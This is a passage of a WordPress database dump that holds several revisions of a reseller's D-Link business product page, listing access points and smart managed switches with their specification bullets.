Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:41:58','2019-09-25 04:41:58','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3375,1,'2019-09-25 12:43:14','2019-09-25 04:43:14','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:43:14','2019-09-25 04:43:14','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3376,1,'2019-09-25 12:44:35','2019-09-25 04:44:35','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice 